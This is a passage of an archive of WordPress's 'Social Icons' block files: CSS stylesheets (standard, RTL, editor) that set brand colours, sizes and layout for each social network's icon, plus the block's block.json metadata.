.wp-social-link-gravatar{background-color:#1d4fc4;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-instagram{background-color:#f00075;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-lastfm{background-color:#e21b24;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-linkedin{background-color:#0d66c2;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-mastodon{background-color:#3288d4;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-medium{background-color:#000;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-meetup{background-color:#f6405f;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-patreon{background-color:#000;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-pinterest{background-color:#e60122;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-pocket{background-color:#ef4155;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-reddit{background-color:#ff4500;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-skype{background-color:#0478d7;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-snapchat{background-color:#fefc00;color:#fff;stroke:#000}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-soundcloud{background-color:#ff5600;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-spotify{background-color:#1bd760;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-telegram{background-color:#2aabee;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-threads{background-color:#000;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-tiktok{background-color:#000;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-tumblr{background-color:#011835;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-twitch{background-color:#6440a4;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-twitter{background-color:#1da1f2;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-vimeo{background-color:#1eb7ea;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-vk{background-color:#4680c2;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-wordpress{background-color:#3499cd;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-whatsapp{background-color:#25d366;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-x{background-color:#000;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-yelp{background-color:#d32422;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-youtube{background-color:red;color:#fff}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link{background:none}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link svg{height:1.25em;width:1.25em}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-amazon{color:#f90}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-bandcamp{color:#1ea0c3}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-behance{color:#0757fe}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-bluesky{color:#0a7aff}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-codepen{color:#1e1f26}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-deviantart{color:#02e49b}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-dribbble{color:#e94c89}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-dropbox{color:#4280ff}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-etsy{color:#f45800}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-facebook{color:#1778f2}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-fivehundredpx{color:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-flickr{color:#0461dd}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-foursquare{color:#e65678}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-github{color:#24292d}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-goodreads{color:#382110}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-google{color:#ea4434}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-gravatar{color:#1d4fc4}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-instagram{color:#f00075}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-lastfm{color:#e21b24}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-linkedin{color:#0d66c2}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-mastodon{color:#3288d4}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-medium{color:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-meetup{color:#f6405f}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-patreon{color:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-pinterest{color:#e60122}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-pocket{color:#ef4155}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-reddit{color:#ff4500}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-skype{color:#0478d7}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-snapchat{color:#fff;stroke:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-soundcloud{color:#ff5600}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-spotify{color:#1bd760}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-telegram{color:#2aabee}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-threads{color:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-tiktok{color:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-tumblr{color:#011835}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-twitch{color:#6440a4}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-twitter{color:#1da1f2}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-vimeo{color:#1eb7ea}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-vk{color:#4680c2}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-whatsapp{color:#25d366}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-wordpress{color:#3499cd}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-x{color:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-yelp{color:#d32422}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-youtube{color:red}.wp-block-social-links.is-style-pill-shape .wp-social-link{width:auto}:root :where(.wp-block-social-links .wp-social-link a){padding:.25em}:root :where(.wp-block-social-links.is-style-logos-only .wp-social-link a){padding:0}:root :where(.wp-block-social-links.is-style-pill-shape .wp-social-link a){padding-left:.66667em;padding-right:.66667em}.wp-block-social-links:not(.has-icon-color):not(.has-icon-background-color) .wp-social-link-snapchat .wp-block-social-link-label{color:#000}social-links/style.css000060400000030324151330427370011011 0ustar00.wp-block-social-links{
  background:none;
  box-sizing:border-box;
  margin-left:0;
  padding-left:0;
  padding-right:0;
  text-indent:0;
}
.wp-block-social-links .wp-social-link a,.wp-block-social-links .wp-social-link a:hover{
  border-bottom:0;
  box-shadow:none;
  text-decoration:none;
}
.wp-block-social-links .wp-social-link svg{
  height:1em;
  width:1em;
}
.wp-block-social-links .wp-social-link span:not(.screen-reader-text){
  font-size:.65em;
  margin-left:.5em;
  margin-right:.5em;
}
.wp-block-social-links.has-small-icon-size{
  font-size:16px;
}
.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{
  font-size:24px;
}
.wp-block-social-links.has-large-icon-size{
  font-size:36px;
}
.wp-block-social-links.has-huge-icon-size{
  font-size:48px;
}
.wp-block-social-links.aligncenter{
  display:flex;
  justify-content:center;
}
.wp-block-social-links.alignright{
  justify-content:flex-end;
}

.wp-block-social-link{
  border-radius:9999px;
  display:block;
  height:auto;
  transition:transform .1s ease;
}
@media (prefers-reduced-motion:reduce){
  .wp-block-social-link{
    transition-delay:0s;
    transition-duration:0s;
  }
}
.wp-block-social-link a{
  align-items:center;
  display:flex;
  line-height:0;
  transition:transform .1s ease;
}
.wp-block-social-link:hover{
  transform:scale(1.1);
}

.wp-block-social-links .wp-block-social-link.wp-social-link{
  display:inline-block;
  margin:0;
  padding:0;
}
.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor svg,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:active,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:hover,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:visited{
  color:currentColor;
  fill:currentColor;
}

:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link{
  background-color:#f0f0f0;
  color:#444;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-amazon{
  background-color:#f90;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-bandcamp{
  background-color:#1ea0c3;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-behance{
  background-color:#0757fe;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-bluesky{
  background-color:#0a7aff;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-codepen{
  background-color:#1e1f26;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-deviantart{
  background-color:#02e49b;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-dribbble{
  background-color:#e94c89;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-dropbox{
  background-color:#4280ff;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-etsy{
  background-color:#f45800;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-facebook{
  background-color:#1778f2;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-fivehundredpx{
  background-color:#000;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-flickr{
  background-color:#0461dd;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-foursquare{
  background-color:#e65678;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-github{
  background-color:#24292d;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-goodreads{
  background-color:#eceadd;
  color:#382110;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-google{
  background-color:#ea4434;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-gravatar{
  background-color:#1d4fc4;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-instagram{
  background-color:#f00075;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-lastfm{
  background-color:#e21b24;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-linkedin{
  background-color:#0d66c2;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-mastodon{
  background-color:#3288d4;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-medium{
  background-color:#000;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-meetup{
  background-color:#f6405f;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-patreon{
  background-color:#000;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-pinterest{
  background-color:#e60122;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-pocket{
  background-color:#ef4155;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-reddit{
  background-color:#ff4500;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-skype{
  background-color:#0478d7;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-snapchat{
  background-color:#fefc00;
  color:#fff;
  stroke:#000;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-soundcloud{
  background-color:#ff5600;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-spotify{
  background-color:#1bd760;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-telegram{
  background-color:#2aabee;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-threads{
  background-color:#000;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-tiktok{
  background-color:#000;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-tumblr{
  background-color:#011835;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-twitch{
  background-color:#6440a4;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-twitter{
  background-color:#1da1f2;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-vimeo{
  background-color:#1eb7ea;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-vk{
  background-color:#4680c2;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-wordpress{
  background-color:#3499cd;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-whatsapp{
  background-color:#25d366;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-x{
  background-color:#000;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-yelp{
  background-color:#d32422;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-youtube{
  background-color:red;
  color:#fff;
}

:where(.wp-block-social-links.is-style-logos-only) .wp-social-link{
  background:none;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link svg{
  height:1.25em;
  width:1.25em;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-amazon{
  color:#f90;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-bandcamp{
  color:#1ea0c3;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-behance{
  color:#0757fe;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-bluesky{
  color:#0a7aff;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-codepen{
  color:#1e1f26;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-deviantart{
  color:#02e49b;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-dribbble{
  color:#e94c89;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-dropbox{
  color:#4280ff;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-etsy{
  color:#f45800;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-facebook{
  color:#1778f2;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-fivehundredpx{
  color:#000;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-flickr{
  color:#0461dd;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-foursquare{
  color:#e65678;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-github{
  color:#24292d;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-goodreads{
  color:#382110;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-google{
  color:#ea4434;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-gravatar{
  color:#1d4fc4;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-instagram{
  color:#f00075;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-lastfm{
  color:#e21b24;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-linkedin{
  color:#0d66c2;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-mastodon{
  color:#3288d4;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-medium{
  color:#000;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-meetup{
  color:#f6405f;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-patreon{
  color:#000;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-pinterest{
  color:#e60122;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-pocket{
  color:#ef4155;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-reddit{
  color:#ff4500;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-skype{
  color:#0478d7;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-snapchat{
  color:#fff;
  stroke:#000;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-soundcloud{
  color:#ff5600;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-spotify{
  color:#1bd760;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-telegram{
  color:#2aabee;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-threads{
  color:#000;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-tiktok{
  color:#000;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-tumblr{
  color:#011835;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-twitch{
  color:#6440a4;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-twitter{
  color:#1da1f2;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-vimeo{
  color:#1eb7ea;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-vk{
  color:#4680c2;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-whatsapp{
  color:#25d366;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-wordpress{
  color:#3499cd;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-x{
  color:#000;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-yelp{
  color:#d32422;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-youtube{
  color:red;
}

.wp-block-social-links.is-style-pill-shape .wp-social-link{
  width:auto;
}

:root :where(.wp-block-social-links .wp-social-link a){
  padding:.25em;
}

:root :where(.wp-block-social-links.is-style-logos-only .wp-social-link a){
  padding:0;
}

:root :where(.wp-block-social-links.is-style-pill-shape .wp-social-link a){
  padding-left:.66667em;
  padding-right:.66667em;
}

.wp-block-social-links:not(.has-icon-color):not(.has-icon-background-color) .wp-social-link-snapchat .wp-block-social-link-label{
  color:#000;
}social-links/editor-rtl.min.css000060400000003755151330427370012530 0ustar00.wp-block-social-links div.block-editor-url-input{display:inline-block;margin-right:8px}.wp-social-link:hover{transform:none}:root :where(.wp-block-social-links),:root :where(.wp-block-social-links.is-style-logos-only .wp-block-social-links__social-placeholder .wp-social-link){padding:0}:root :where(.wp-block-social-links__social-placeholder .wp-social-link){padding:.25em}:root :where(.wp-block-social-links.is-style-pill-shape .wp-block-social-links__social-placeholder .wp-social-link){padding-left:.66667em;padding-right:.66667em}.wp-block-social-links__social-placeholder{display:flex;list-style:none;opacity:.8}.wp-block-social-links__social-placeholder>.wp-social-link{margin-left:0!important;margin-right:0!important;padding-left:0!important;padding-right:0!important;visibility:hidden;width:0!important}.wp-block-social-links__social-placeholder>.wp-block-social-links__social-placeholder-icons{display:flex}.wp-block-social-links__social-placeholder .wp-social-link:before{border-radius:50%;content:"";display:block;height:1em;width:1em}.is-style-logos-only .wp-block-social-links__social-placeholder .wp-social-link:before{background:currentColor}.wp-block-social-links .wp-block-social-links__social-prompt{cursor:default;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;line-height:24px;list-style:none;margin-bottom:auto;margin-top:auto;min-height:24px;padding-left:8px}.wp-block.wp-block-social-links.aligncenter,.wp-block[data-align=center]>.wp-block-social-links{justify-content:center}.block-editor-block-preview__content .components-button:disabled{opacity:1}.wp-social-link.wp-social-link__is-incomplete{opacity:.5}@media (prefers-reduced-motion:reduce){.wp-social-link.wp-social-link__is-incomplete{transition-delay:0s;transition-duration:0s}}.wp-block-social-links .is-selected .wp-social-link__is-incomplete,.wp-social-link.wp-social-link__is-incomplete:focus,.wp-social-link.wp-social-link__is-incomplete:hover{opacity:1}social-links/editor-rtl.css000060400000004247151330427370011743 0ustar00.wp-block-social-links div.block-editor-url-input{
  display:inline-block;
  margin-right:8px;
}

.wp-social-link:hover{
  transform:none;
}

:root :where(.wp-block-social-links),:root :where(.wp-block-social-links.is-style-logos-only .wp-block-social-links__social-placeholder .wp-social-link){
  padding:0;
}

:root :where(.wp-block-social-links__social-placeholder .wp-social-link){
  padding:.25em;
}

:root :where(.wp-block-social-links.is-style-pill-shape .wp-block-social-links__social-placeholder .wp-social-link){
  padding-left:.66667em;
  padding-right:.66667em;
}

.wp-block-social-links__social-placeholder{
  display:flex;
  list-style:none;
  opacity:.8;
}
.wp-block-social-links__social-placeholder>.wp-social-link{
  margin-left:0 !important;
  margin-right:0 !important;
  padding-left:0 !important;
  padding-right:0 !important;
  visibility:hidden;
  width:0 !important;
}
.wp-block-social-links__social-placeholder>.wp-block-social-links__social-placeholder-icons{
  display:flex;
}
.wp-block-social-links__social-placeholder .wp-social-link:before{
  border-radius:50%;
  content:"";
  display:block;
  height:1em;
  width:1em;
}
.is-style-logos-only .wp-block-social-links__social-placeholder .wp-social-link:before{
  background:currentColor;
}

.wp-block-social-links .wp-block-social-links__social-prompt{
  cursor:default;
  font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;
  font-size:13px;
  line-height:24px;
  list-style:none;
  margin-bottom:auto;
  margin-top:auto;
  min-height:24px;
  padding-left:8px;
}

.wp-block.wp-block-social-links.aligncenter,.wp-block[data-align=center]>.wp-block-social-links{
  justify-content:center;
}

.block-editor-block-preview__content .components-button:disabled{
  opacity:1;
}

.wp-social-link.wp-social-link__is-incomplete{
  opacity:.5;
}
@media (prefers-reduced-motion:reduce){
  .wp-social-link.wp-social-link__is-incomplete{
    transition-delay:0s;
    transition-duration:0s;
  }
}

.wp-block-social-links .is-selected .wp-social-link__is-incomplete,.wp-social-link.wp-social-link__is-incomplete:focus,.wp-social-link.wp-social-link__is-incomplete:hover{
  opacity:1;
}social-links/block.json000060400000004106151330427370011123 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/social-links",
	"title": "Social Icons",
	"category": "widgets",
	"allowedBlocks": [ "core/social-link" ],
	"description": "Display icons linking to your social profiles or sites.",
	"keywords": [ "links" ],
	"textdomain": "default",
	"attributes": {
		"iconColor": {
			"type": "string"
		},
		"customIconColor": {
			"type": "string"
		},
		"iconColorValue": {
			"type": "string"
		},
		"iconBackgroundColor": {
			"type": "string"
		},
		"customIconBackgroundColor": {
			"type": "string"
		},
		"iconBackgroundColorValue": {
			"type": "string"
		},
		"openInNewTab": {
			"type": "boolean",
			"default": false
		},
		"showLabels": {
			"type": "boolean",
			"default": false
		},
		"size": {
			"type": "string"
		}
	},
	"providesContext": {
		"openInNewTab": "openInNewTab",
		"showLabels": "showLabels",
		"iconColor": "iconColor",
		"iconColorValue": "iconColorValue",
		"iconBackgroundColor": "iconBackgroundColor",
		"iconBackgroundColorValue": "iconBackgroundColorValue"
	},
	"supports": {
		"align": [ "left", "center", "right" ],
		"anchor": true,
		"__experimentalExposeControlsToChildren": true,
		"layout": {
			"allowSwitching": false,
			"allowInheriting": false,
			"allowVerticalAlignment": false,
			"default": {
				"type": "flex"
			}
		},
		"color": {
			"enableContrastChecker": false,
			"background": true,
			"gradients": true,
			"text": false,
			"__experimentalDefaultControls": {
				"background": false
			}
		},
		"spacing": {
			"blockGap": [ "horizontal", "vertical" ],
			"margin": true,
			"padding": true,
			"units": [ "px", "em", "rem", "vh", "vw" ],
			"__experimentalDefaultControls": {
				"blockGap": true,
				"margin": true,
				"padding": false
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"styles": [
		{ "name": "default", "label": "Default", "isDefault": true },
		{ "name": "logos-only", "label": "Logos Only" },
		{ "name": "pill-shape", "label": "Pill Shape" }
	],
	"editorStyle": "wp-block-social-links-editor",
	"style": "wp-block-social-links"
}
social-links/style-rtl.css000060400000030325151330427370011611 0ustar00.wp-block-social-links{
  background:none;
  box-sizing:border-box;
  margin-right:0;
  padding-left:0;
  padding-right:0;
  text-indent:0;
}
.wp-block-social-links .wp-social-link a,.wp-block-social-links .wp-social-link a:hover{
  border-bottom:0;
  box-shadow:none;
  text-decoration:none;
}
.wp-block-social-links .wp-social-link svg{
  height:1em;
  width:1em;
}
.wp-block-social-links .wp-social-link span:not(.screen-reader-text){
  font-size:.65em;
  margin-left:.5em;
  margin-right:.5em;
}
.wp-block-social-links.has-small-icon-size{
  font-size:16px;
}
.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{
  font-size:24px;
}
.wp-block-social-links.has-large-icon-size{
  font-size:36px;
}
.wp-block-social-links.has-huge-icon-size{
  font-size:48px;
}
.wp-block-social-links.aligncenter{
  display:flex;
  justify-content:center;
}
.wp-block-social-links.alignright{
  justify-content:flex-end;
}

.wp-block-social-link{
  border-radius:9999px;
  display:block;
  height:auto;
  transition:transform .1s ease;
}
@media (prefers-reduced-motion:reduce){
  .wp-block-social-link{
    transition-delay:0s;
    transition-duration:0s;
  }
}
.wp-block-social-link a{
  align-items:center;
  display:flex;
  line-height:0;
  transition:transform .1s ease;
}
.wp-block-social-link:hover{
  transform:scale(1.1);
}

.wp-block-social-links .wp-block-social-link.wp-social-link{
  display:inline-block;
  margin:0;
  padding:0;
}
.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor svg,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:active,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:hover,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:visited{
  color:currentColor;
  fill:currentColor;
}

:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link{
  background-color:#f0f0f0;
  color:#444;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-amazon{
  background-color:#f90;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-bandcamp{
  background-color:#1ea0c3;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-behance{
  background-color:#0757fe;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-bluesky{
  background-color:#0a7aff;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-codepen{
  background-color:#1e1f26;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-deviantart{
  background-color:#02e49b;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-dribbble{
  background-color:#e94c89;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-dropbox{
  background-color:#4280ff;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-etsy{
  background-color:#f45800;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-facebook{
  background-color:#1778f2;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-fivehundredpx{
  background-color:#000;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-flickr{
  background-color:#0461dd;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-foursquare{
  background-color:#e65678;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-github{
  background-color:#24292d;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-goodreads{
  background-color:#eceadd;
  color:#382110;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-google{
  background-color:#ea4434;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-gravatar{
  background-color:#1d4fc4;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-instagram{
  background-color:#f00075;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-lastfm{
  background-color:#e21b24;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-linkedin{
  background-color:#0d66c2;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-mastodon{
  background-color:#3288d4;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-medium{
  background-color:#000;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-meetup{
